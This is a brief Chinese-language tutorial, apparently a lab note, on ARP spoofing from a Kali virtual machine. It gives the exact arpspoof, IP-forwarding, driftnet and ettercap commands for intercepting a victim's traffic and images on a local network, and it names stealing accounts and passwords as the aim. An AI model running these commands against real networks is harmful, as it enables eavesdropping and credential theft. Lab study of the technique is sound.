arpspoof 是一款进行arp欺骗的工具,攻击者通过毒化受害者arp缓存,将网关mac替换为攻击者mac,然后攻击者可截获受害者发送和收到的数据包,可获取受害者账户、密码等相关敏感信息。
Kali主机采用虚拟机---桥接模式
攻击者ip:192.168.1.3
受害者ip:192.168.1.2
网关IP:192.168.1.1
#ip a
查看192.168.1.3的网卡名,我这台主机叫eth0
echo 1 >/proc/sys/net/ipv4/ip_forward
arpspoof -t 192.168.1.2 192.168.1.1 -i eth0
此时kali可拦截相关受害者主机相关信息,开启wireshark拦截受害者ping数据 利用driftnet 窃取受害者网络中传输的图片,图片以小窗口的形式显示
driftnet -i eth0
ettercap -Tq -i eth0
开启转发功能目标能正常访问互联网
未开启转发无法访问互联网
停止攻击后目标可正常访问互联网
欺骗过程